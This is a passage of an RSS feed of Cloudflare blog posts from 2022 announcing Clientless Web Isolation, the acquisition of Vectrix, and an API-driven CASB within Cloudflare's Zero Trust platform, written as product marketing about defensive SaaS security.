    </div>
    <p>Detect, prevent, and fix. With detailed SaaS remediation guides, IT administrators can assign and tackle issues with the right team. By arming teams with what they need to know in context, it makes preventing issues from happening again seamless. In situations where action should be taken straight away, automated SaaS workflows provide the ability to solve SaaS security issues in one click. Need to remove sharing permissions from that file in OneDrive? A remediation button allows for action from anywhere, anytime.</p>
    <div>
      <h3>Cloudflare Gateway + CASB</h3>
      <a href="#cloudflare-gateway-casb">
        
      </a>
    </div>
    <p>Combining products across the <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> platform means solving complex problems through one seamless experience. Starting with the power of <a href="https://www.cloudflare.com/products/zero-trust/gateway/">Gateway</a> and CASB, customers will be able to take immediate action to wrangle in <a href="/introducing-shadow-it-discovery/">Shadow IT</a>. In just a few clicks, a detected unauthorized SaaS application from the Gateway shadow IT report can go from being the wild west to a sanctioned and secure one with a CASB integration. This is just one example to highlight the many solutions we’re excited about that can be solved with the <a href="https://www.cloudflare.com/zero-trust/solutions/">Zero Trust platform</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2xUzXluYMtMoRh54FG6tHP/3ac7e7eb9411d900c8e2c17be0c09052/image2-63.png" />
            
            </figure>
    <div>
      <h2>Launching the Cloudflare CASB beta and what you can expect</h2>
      <a href="#launching-the-cloudflare-casb-beta-and-what-you-can-expect">
        
      </a>
    </div>
    <p>In the CASB beta you can deploy popular integrations like Google Workspace on day one. You’ll also get direct access to our Product team to help shape what comes next. We’re excited to work closely with a number of early customers to align on which integrations and features matter most to them.</p>
    <div>
      <h2>Getting started today with the Cloudflare CASB beta</h2>
      <a href="#getting-started-today-with-the-cloudflare-casb-beta">
        
      </a>
    </div>
    <p>Right now we’re working on making the out-of-band CASB product a seamless part of the Zero Trust platform. We'll be sending out the first wave of beta invitations early next month – you can <a href="https://www.cloudflare.com/products/zero-trust/lp/casb-beta/">request access here</a>.</p><p>We have some big ideas of what the CASB product can and will do. While this post highlights some exciting things to come, you can get started right now with Cloudflare’s Zero Trust platform by <a href="https://dash.cloudflare.com/sign-up/teams">signing up here</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[SaaS]]></category>
            <guid isPermaLink="false">Nw0EqXr6RdYAdrkV4Uknx</guid>
            <dc:creator>Corey Mahan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Clientless Web Isolation is now generally available]]></title>
            <link>https://blog.cloudflare.com/clientless-web-isolation-general-availability/</link>
            <pubDate>Thu, 17 Mar 2022 12:59:16 GMT</pubDate>
            <description><![CDATA[ Today, we’re excited to announce that Clientless Web Isolation is generally available ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Today, we’re excited to announce that Clientless Web Isolation is generally available. A new on-ramp for Browser Isolation that natively integrates <a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">Zero Trust Network Access (ZTNA)</a> with the zero-day, phishing and data-loss protection benefits of <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">remote browsing</a> for users on any device browsing any website, internal app or SaaS application. All without needing to install any software or configure any certificates on the endpoint device.</p><p>Cloudflare’s clientless web isolation simplifies connections to remote browsers through a hyperlink (e.g.: <code><i>https://&lt;your-auth-domain&gt;.cloudflareaccess.com/browser</i></code>). We explored use cases in detail in our <a href="/introducing-clientless-web-isolation-beta/">beta announcement post</a>, but here’s a quick refresher on the use cases that clientless isolated browsing enables:</p>
    <div>
      <h3>Share secure browsing across the entire team on any device</h3>
      <a href="#share-secure-browsing-across-the-entire-team-on-any-device">
        
      </a>
    </div>
    <p>Simply navigating to Clientless Web Isolation will land your user such as an analyst, or researcher in a remote browser, ready to securely conduct their research or investigation without exposing their public IP or device to potentially malicious code on the target website.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1sJbqtKReRhveJAvlYVOm4/675f9e44c799baf28d69c2325758e50c/image1-66.png" />
            
            </figure>
    <div>
      <h3>Deep link into isolated browsing</h3>
      <a href="#deep-link-into-isolated-browsing">
        
      </a>
    </div>
    <p>Suspicious hyperlinks and PDF documents from sensitive applications can be opened in a remote browser by rewriting the link with the clientless endpoint. For example:</p><p><code>https://&lt;authdomain&gt;.cloudflareaccess.com/browser/https://www.example.com/suspiciouslink</code></p><p>This is powerful when integrated into a security incident monitoring tool, help desk or any tool where users are clicking unknown or untrusted hyperlinks.</p>
    <div>
      <h3>Integrate Browser Isolation with a third-party secure web gateway</h3>
      <a href="#integrate-browser-isolation-with-a-third-party-secure-web-gateway">
        
      </a>
    </div>
    <p>Browser Isolation can be integrated with a legacy <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">secure web gateway</a> through the use of a redirecting custom block page. Integrating Browser Isolation with your existing secure web gateway enables safe browsing without the support burden of micromanaging block lists.</p><p>See our <a href="https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/clientless-browser-isolation">developer documentation</a> for example block pages.</p>
    <div>
      <h3>Securely access sensitive data on BYOD devices endpoints</h3>
      <a href="#securely-access-sensitive-data-on-byod-devices-endpoints">
        
      </a>
    </div>
    <p>In an ideal world, users would always access sensitive data from corporate devices. Unfortunately it’s not possible or feasible: contractors, by definition, rely on non-corporate devices. Employees may not be able to take their device home, it is unavailable due to a disaster or travel to high risk areas without their managed machine.</p><p>Historically IT departments have worked around this by adopting legacy Virtual Desktop Infrastructure (VDI). This made sense a decade ago when most business applications were desktop applications. Today this architecture makes little sense when most business applications live in the browser. VDI is a tremendously expensive method to deliver BYOD support and still requires complex network administration to connect with DNS filtering and Secure Web Gateways.</p><p>All traffic from Browser Isolation to the Internet or an Access protected application is secured and inspected by the Secure Web Gateway out of the box. It only takes a few clicks to <a href="https://developers.cloudflare.com/cloudflare-one/tutorials/require-swg/">require Gateway</a> device posture checks for users connecting over Clientless Web Isolation.</p>
    <div>
      <h3>Get started</h3>
      <a href="#get-started">
        
      </a>
    </div>
    <p>Clientless web isolation is available as a capability for all Cloudflare Zero Trust subscribers who have added Browser Isolation to their plan. If you are interested in learning more about use cases see the <a href="/introducing-clientless-web-isolation-beta/">beta announcement post</a> and our <a href="https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/clientless-browser-isolation/">developer documentation</a>.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <category><![CDATA[Clientless Web Isolation]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare Access]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">267VYT5VXwJYqwLC47qgJe</guid>
            <dc:creator>Tim Obezuk</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare acquires Vectrix to expand Zero Trust SaaS security]]></title>
            <link>https://blog.cloudflare.com/cloudflare-acquires-vectrix-to-expand-zero-trust-saas-security/</link>
            <pubDate>Thu, 10 Feb 2022 21:19:31 GMT</pubDate>
            <description><![CDATA[ We are excited to share that Vectrix has been acquired by Cloudflare! 
Vectrix helps IT and security teams detect security issues across their SaaS applications ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dOkY5QDJfM6IXw2bL6gtT/e4c8f799e885d0bca83e75cdb50f78ae/image2-10.png" />
            
            </figure><p>We are excited to share that Vectrix has been acquired by Cloudflare!</p><p>Vectrix helps IT and security teams detect security issues across their SaaS applications. We look at both data and users in SaaS apps to alert teams to issues ranging from unauthorized user access and file exposure to misconfigurations and shadow IT.</p><p>We built Vectrix to solve a problem that terrified us as security engineers ourselves: how do we know if the SaaS apps we use have the right controls in place? Is our company data protected? SaaS tools make it easy to work with data and collaborate across organizations of any size, but that also makes them vulnerable.</p>
    <div>
      <h3>The growing SaaS security problem</h3>
      <a href="#the-growing-saas-security-problem">
        
      </a>
    </div>
    <p>The past two years have accelerated SaaS adoption much faster than any of us could have imagined and without much input on how to secure this new business stack.</p><p>Google Workspace for collaboration. Microsoft Teams for communication. Workday for HR. Salesforce for customer relationship management. The list goes on.</p><p>With this new reliance on SaaS, IT and security teams are faced with a new set of problems like files and folders being made public on the Internet, external users joining private chat channels, or an employee downloading all customer data from customer relationship tools.</p><p>The challenge of securing users and data across even a handful of applications, each with its own set of security risks and a unique way of protecting it, is overwhelming for most IT and security teams. Where should they begin?</p>
    <div>
      <h3>One platform, many solutions</h3>
      <a href="#one-platform-many-solutions">
        
      </a>
    </div>
    <p>Enter the API-driven <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">Cloud Access Security Broker (CASB)</a>. We think about an API-driven CASB as a solution that can scan, detect, and continuously monitor for security issues across organization-approved, IT-managed SaaS apps like Microsoft 365, ServiceNow, Zoom, or Okta.</p><p>CASB solutions help teams with:</p><ul><li><p><b>Data security</b> - ensuring the wrong file or folder is not shared publicly in Dropbox.</p></li><li><p><b>User activity</b> - alerting to suspicious user permissions changing in Workday at 2:00 AM.</p></li><li><p><b>Misconfigurations</b> - keeping Zoom Recordings from becoming publicly accessible.</p></li><li><p><b>Compliance</b> - tracking and reporting who modified Bitbucket branch permissions.</p></li><li><p><b>Shadow IT</b> - detecting users that signed up for an unapproved app with their work email.</p></li></ul><p><a href="https://www.cloudflare.com/application-services/solutions/">Securing SaaS applications</a> starts with visibility into what users and data reside in a service, and then understanding how they’re used. From there, protective and preventive measures, within the SaaS application and on the network, can be used to ensure data stays safe.</p><p>It’s not always the extremely complex things either. A really good example of this came from an early Vectrix customer who asked if we could detect public Google Calendars for them. They recently had an issue where someone on the team had shared their calendar which contained several sensitive meeting links and passcodes. They would have saved themselves a headache if they could have detected this prior, and even better, been able to correct it in a few clicks.</p><p>In this SaaS age something as innocent as a calendar invite can introduce risks that IT and security teams now have to think about. This is why we’re excited to grow further at Cloudflare, helping more teams stay one step ahead.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/N1DZNQ3B5Av5h94AmYCyZ/158720e015e7ecdfaa6321f87465d84f/image3-14.png" />
            
            </figure>
    <div>
      <h3>Ridiculously easy setup</h3>
      <a href="#ridiculously-easy-setup">
        
      </a>
    </div>
    <p>A core component of an API-first approach is the access system, which powers integrations via an OAuth 2.0 or vendor marketplace app to authorize secure API access into SaaS services. This means the API-driven CASB works out of band, or not in the direct network path, and won’t cause any network slowdowns or require any network configuration changes.</p><p>In just a few clicks, you can securely integrate with SaaS apps from anywhere—no agents, no installs, no downloads.</p><p>Over a cup of coffee an IT or security system administrator can connect their company's critical SaaS apps and start getting visibility into data and user activity right away. In fact, we usually see no more than 15 minutes pass from creating an account to the first findings being reported.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7uHxEUxm4HmZl5rWnVF1Fu/d64adb38cb72d1d612fea57b09419346/image1-11.png" />
            
            </figure>
    <div>
      <h3>The more, the merrier</h3>
      <a href="#the-more-the-merrier">
        
      </a>
    </div>
    <p>By integrating with more and more organization-approved SaaS application patterns that may otherwise not be visible start to emerge.</p><p>For example, being alerted that Sam attempted to disable two-factor authentication in multiple SaaS applications may indicate a need for more security awareness training. Or being able to detect numerous users granting sensitive account permissions to an unapproved third-party app could indicate a possible phishing attempt.</p><p>The more integrations you protect the better your overall SaaS security becomes.</p>
    <div>
      <h3>Better together in Zero Trust</h3>
      <a href="#better-together-in-zero-trust">
        
      </a>
    </div>
    <p>The entire Vectrix team has joined Cloudflare and will be integrating API-driven CASB functionality into the <a href="https://www.cloudflare.com/products/zero-trust/">Cloudflare Zero Trust platform</a>, launching later this year.</p><p>This means an already impressive set of growing products like <a href="https://www.cloudflare.com/teams/access/">Access (ZTNA)</a>, <a href="https://www.cloudflare.com/teams/gateway/">Gateway (SWG)</a>, and <a href="https://www.cloudflare.com/teams/browser-isolation/">Browser Isolation</a>, will be getting even better, together. Even more exciting though, is that using all of these services will be a seamless experience, managed from a unified <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust platform</a> and dashboard.</p><p>A few examples of what we’re looking forward to growing together are:</p><ul><li><p><b>Shadow IT:</b> use <a href="https://www.cloudflare.com/teams/gateway/">Gateway</a> to detect all your SaaS apps in use, block those that are unapproved, and use CASB to ensure your data stays safe in sanctioned ones.</p></li><li><p><b>Secure access</b>: use <a href="https://www.cloudflare.com/teams/access/">Access</a> to ensure only users who match your device policies will be allowed into SaaS apps and CASB to ensure the SaaS app stays configured only for your approved authentication method.</p></li><li><p><b>Data control</b>: use <a href="https://www.cloudflare.com/teams/browser-isolation/">Browser Isolation</a>’s input controls to prevent users from copy/pasting or printing data and CASB to ensure the data isn’t modified to be shared publicly from within the SaaS app itself for total control.</p></li></ul>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>Vectrix will be integrated into the <a href="https://www.cloudflare.com/products/zero-trust/">Cloudflare Zero Trust platform</a> to extend the security of Cloudflare’s global network to the data stored in SaaS applications from a single control plane.</p><p>If you’d like early beta access, <a href="https://www.cloudflare.com/products/zero-trust/lp/casb-beta">please click here to join the waitlist</a>. We will send invites out in the sign-up order we received them. You can learn more about the acquisition <a href="/cloudflare-zero-trust-casb/">here</a>.</p> ]]></content:encoded>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare for SaaS]]></category>
            <category><![CDATA[Acquisitions]]></category>
            <category><![CDATA[SaaS]]></category>
            <guid isPermaLink="false">12fnt5xyJTCWx4Jjs0OpDA</guid>
            <dc:creator>Corey Mahan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Adding a CASB to Cloudflare Zero Trust]]></title>
            <link>https://blog.cloudflare.com/cloudflare-zero-trust-casb/</link>
            <pubDate>Thu, 10 Feb 2022 21:18:00 GMT</pubDate>
            <description><![CDATA[ Earlier today, Cloudflare announced that we have acquired Vectrix, a cloud-access security broker (CASB) company focused on solving the problem of control and visibility in the SaaS applications and public cloud providers that your team uses ]]></description>
            <content:encoded><![CDATA[ <p>Earlier today, Cloudflare <a href="https://www.cloudflare.com/press-releases/2022/cloudflare-acquires-vectrix/">announced</a> that we have acquired Vectrix, a <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">cloud-access security broker (CASB)</a> company focused on solving the problem of control and visibility in the SaaS applications and public cloud providers that your team uses.</p><p>We are excited to welcome the Vectrix team and their technology to the Cloudflare Zero Trust product group. We don’t believe a CASB should be a point solution. Instead, the features of a CASB should be one component of a comprehensive <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> deployment. Each piece of technology, CASB included, should work better together than they would as a standalone product.</p><p>We know that this migration is a journey for most customers. That’s true for our own team at Cloudflare, too. We’ve built our own <a href="https://www.cloudflare.com/zero-trust/solutions/">Zero Trust platform</a> to solve problems for customers at any stage of that journey.</p>
    <div>
      <h2>Start by defending the resources you control</h2>
      <a href="#start-by-defending-the-resources-you-control">
        
      </a>
    </div>
    <p>Several years ago, we protected the internal resources that Cloudflare employees needed by creating a private network with hardware appliances. We deployed applications in a data center and made them available to this network. Users inside the San Francisco office connected to a secure Wi-Fi network that placed them on the network.</p><p>For everyone else, we punched a hole in that private network and employees pretended they were in the office by using Virtual Private Network (VPN) clients on their device. We had created a castle-and-moat by attempting to extend the walls of the San Francisco office to the rest of the world.</p><p>Our Security team hated this. Once authenticated to the VPN client, a user could generally connect to any destination on our private network - the network trusted them by default. We lacked segmentation over who could reach what resource. Just as terrifying, we had almost no visibility into what was happening inside the network.</p><p>One option would have been to build out a traditional <a href="https://www.cloudflare.com/learning/access-management/what-is-network-segmentation/">segmented network</a> with internal firewalls and a configuration nightmare keeping VPN appliances, firewalls and servers synchronized. We knew that there was a better, more flexible, more modern way.</p><p>We <a href="/cloudflare-access-now-teams-of-any-size-can-turn-off-their-vpn/">built the first product</a> in Cloudflare One, Cloudflare Access, to solve these problems. Cloudflare Access uses our global network to check every request or connection for identity, group membership, device posture, multifactor method and more to determine if it should be allowed. Organizations can build rules that are <a href="/cloudflare-access-for-saas/">specific to applications</a> or <a href="/zero-trust-private-networking-rules/">IP addresses on a private network</a> that runs on Cloudflare. Cloudflare Access also logs every request and connection, providing high-visibility with low-effort.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/r9LBX7Ixxq9AHT57SGg2t/a39e0621b2e958df0a8b6ddaea545b94/image2-9.png" />
            
            </figure><p>This migration <a href="/dogfooding-from-home/">changed our security model at Cloudflare</a>. We also <a href="/the-zero-trust-platform-built-for-speed/">never had to compromise performance</a> thanks to Cloudflare’s global network and <a href="https://www.cloudflare.com/performance/accelerate-internet-applications/#:~:text=Cloudflare%20increases%20web%20application%20performance,congested%20path%2C%20and%20much%20more.">Application Performance</a> products. Decisions about who is allowed are made milliseconds away from the user in data centers in over 250+ cities around the world. For web applications, Cloudflare Access runs in-line with our <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> and works out-of-the-box with our load balancers. Cloudflare’s network accelerates requests and packets, connecting users to the tools they need even faster.</p><p>Cloudflare Access let us and thousands of other teams deprecate the legacy VPN security model, but the rest of the Internet posed a different kind of challenge—how do we keep our users, and their devices and data, safe from attack?</p>
    <div>
      <h2>Next, protect your team from the rest of the Internet</h2>
      <a href="#next-protect-your-team-from-the-rest-of-the-internet">
        
      </a>
    </div>
    <p>The public Internet allows just about anyone to connect either as a user or a host. That openness is both powerful and terrifying. When employees on corporate devices need to use the rest of the Internet, they run a risk of encountering phishing websites, malware hosts, and other attempts to steal data and compromise businesses.</p><p>Historically, organizations relied on a similar castle-and-moat approach. They backhauled user traffic to any destination on the Internet through a centralized data center. Inside that data center, IT departments installed and monitored physical appliances to provide security like network firewalls, proxies, and <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">secure web gateways</a>.</p><p>This model worked fine when employees only needed to connect to the public Internet occasionally. Most work was performed on the desktop in front of the user. When companies began moving to SaaS applications hosted by other teams, and employees spent the majority of their day on the Internet, this security framework fell apart.</p><p>User experience suffered when all traffic had to first reach a distant security appliance. IT and Security teams had to maintain and patch appliances while struggling to scale up or down. The cost of backhauling traffic over <a href="https://www.cloudflare.com/learning/network-layer/what-is-mpls/">MPLS links</a> erased the financial savings gained by migrating to SaaS applications on the Internet.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CFqGU69JXbDdLi9l0k1Rl/2ad1a59e9edcb518f957281275122d22/image1-10.png" />
            
            </figure><p><a href="https://www.cloudflare.com/products/zero-trust/gateway/">Cloudflare Gateway</a> turns Cloudflare’s network in the other direction to protect users as they connect out to the rest of the Internet. Instead of backhauling traffic to a centralized location, users connect to a nearby Cloudflare data center where we apply one or more layers of security filtering and logging before accelerating their traffic to its final destination.</p><p>Customers can choose how they want to start this journey. Cloudflare operates the world’s fastest DNS resolver, on top of which <a href="/helping-keep-governments-safe-and-secure/">we’ve built DNS filtering</a> powered by the intelligence we collect from handling so much of the Internet every day. Other customers decide to begin by ripping out their network firewall appliances and moving that functionality into Cloudflare’s network by connecting roaming users or entire offices and data centers to Cloudflare.</p><p>As threats become more advanced, Cloudflare’s Secure Web Gateway inspects HTTPS traffic for malware hiding in file downloads or the accidental loss of data to unapproved SaaS services. Cloudflare’s <a href="/phishing-protection-browser/">Browser Isolation service adds another layer</a> of threat protection by running the browser in our network instead of on the user device. With Cloudflare Gateway and Browser Isolation, security teams also can apply granular data loss control to traffic as it flows through our network—from stopping file uploads to blocking copy-and-paste in the web page itself.</p>
    <div>
      <h2>Now, control the data and configurations in your SaaS applications</h2>
      <a href="#now-control-the-data-and-configurations-in-your-saas-applications">
        
      </a>
    </div>
    <p>At this point in a Zero Trust journey, your team can control how users access critical resources and how you keep those users and their data safe from external attack. Both of these require control of the network—inspecting traffic as it leaves devices in your organization or as it arrives in your infrastructure. That leaves one piece missing. As more of your data lives in SaaS applications outside your control, how do you maintain a consistent level of filtering, logging, and auditing?</p><p>The Cloudflare Zero Trust platform released many features in the last year to help customers solve this problem and the broader range of “CASB” challenges. First, we built a feature that allows your team to <a href="/cloudflare-access-for-saas/">force logins to your SaaS applications</a> through Cloudflare’s Secure Web Gateway where you can control rules and visibility. Next, we used the data from the Secure Web Gateway to provide your team with a <a href="/introducing-shadow-it-discovery/">comprehensive Shadow IT report</a> to discover what applications your team is using and what they should be using.</p><p>Customers use the Shadow IT report in particular to begin building <a href="/gateway-app-policies/">rules to block access to unapproved SaaS applications</a>, or to block actions like file uploads to specific unapproved SaaS applications, but the collaboration available in these tools becomes a risk to your organization.</p><p>It’s easy to be a single-click away from a data breach. We could share a document with the public Internet instead of our team. We could leave an S3 bucket unprotected. We could invite the wrong users to a private GitHub repository or install a malicious plugin to our email system. The data-at-rest in these SaaS applications is vulnerable to new types of attacks.</p><p>Some of these applications have tried to solve this problem in their own space, but the rapid adoption of SaaS applications and the struggle to configure each separately led to thousands of wasted hours in security teams. The Vectrix founders talked with teams who had to dedicate full-time employees just to manually configure and check permission settings and logs. So they built a better answer.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7cmmwOLBF0qHh7LI45LWyU/f0fab3c537668ca0f98046f0d5d4b2ac/image3-13.png" />
            
            </figure><p>Vectrix scans the SaaS applications that your team uses to detect anomalies in configuration, permissions, and sharing. Each SaaS application is different - the risks vary from a Google Sheet that is made public to leaked secrets in GitHub - and Vectrix gives customers a single place to control and audit those types of events.</p>
    <div>
      <h2>Why Vectrix?</h2>
      <a href="#why-vectrix">
        
      </a>
    </div>
    <p>To solve this problem for our customers, we evaluated options including building our own API-driven CASB solution and talking to other companies in this space. Vectrix became the best option after evaluating them against the priorities we have for this group of products.</p>
    <div>
      <h3>The Vectrix team is customer obsessed</h3>
      <a href="#the-vectrix-team-is-customer-obsessed">
        
      </a>
    </div>
    <p>Vectrix mission focuses on giving organizations of any size, including those without a large security team, “simple, straightforward security scans that anyone can use…” By <a href="https://www.cloudflare.com/application-services/solutions/">making the solution accessible</a> and easy to use, Vectrix reduces the barrier to security.</p><p>We share that same goal. Cloudflare exists to help build a better Internet. That starts with an Internet made safer by making security tools accessible to anyone. From offering <a href="https://www.cloudflare.com/application-services/products/ssl/">SSL certificates at no cost</a> to any customer to making Zero Trust product group available at no cost to teams of up to 50 users, we are obsessed with helping our customers solve problems previously out of their reach.</p>
    <div>
      <h3>Their technology delivers value faster</h3>
      <a href="#their-technology-delivers-value-faster">
        
      </a>
    </div>
    <p>One of the original pitches of Cloudflare’s Application Security and Performance products was set up that could be completed in less than five minutes. We know that the cost to deploy a new service, especially for smaller teams, can mean that organizations delay making security and performance improvements.</p><p>We don’t think that customers should have to compromise and neither does Vectrix. The Vectrix product focuses on delivering immediate value in less than five minutes after the two or three clicks required to configure the first scan of a SaaS application. Customers can begin to flag risks in their organization in a matter of minutes without the need for a complex deployment.</p>
    <div>
      <h3>1+1=3 in terms of value for our customers when used with our existing Zero Trust products</h3>
      <a href="#1-1-3-in-terms-of-value-for-our-customers-when-used-with-our-existing-zero-trust-products">
        
      </a>
    </div>
    <p>The Vectrix product will not be inserted as a point solution add-on. We’re making it a core part of our Zero Trust bundle because integrating features from products like our Secure Web Gateway give customers a comprehensive solution that works better together.</p>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We’re excited to welcome Vectrix to the Cloudflare team. You can learn more about why they decided to join Cloudflare in <a href="/cloudflare-acquires-vectrix-to-expand-zero-trust-saas-security/">this blog post</a> published today.</p><p>We have already started migrating their services to the Cloudflare global network and plan to open sign-ups for a beta in the next couple of months. If you are interested, please <a href="https://www.cloudflare.com/products/zero-trust/lp/casb-beta/">sign up here</a>. Don’t let the beta delay the start of your own journey with these products—we’ll be inviting users off of the waitlist based on when they first started deploying Cloudflare’s Zero Trust products.</p> ]]></content:encoded>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">1qYufmuNV264UpgY9MHLdG</guid>
            <dc:creator>Sam Rhea</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
    </channel>
</rss>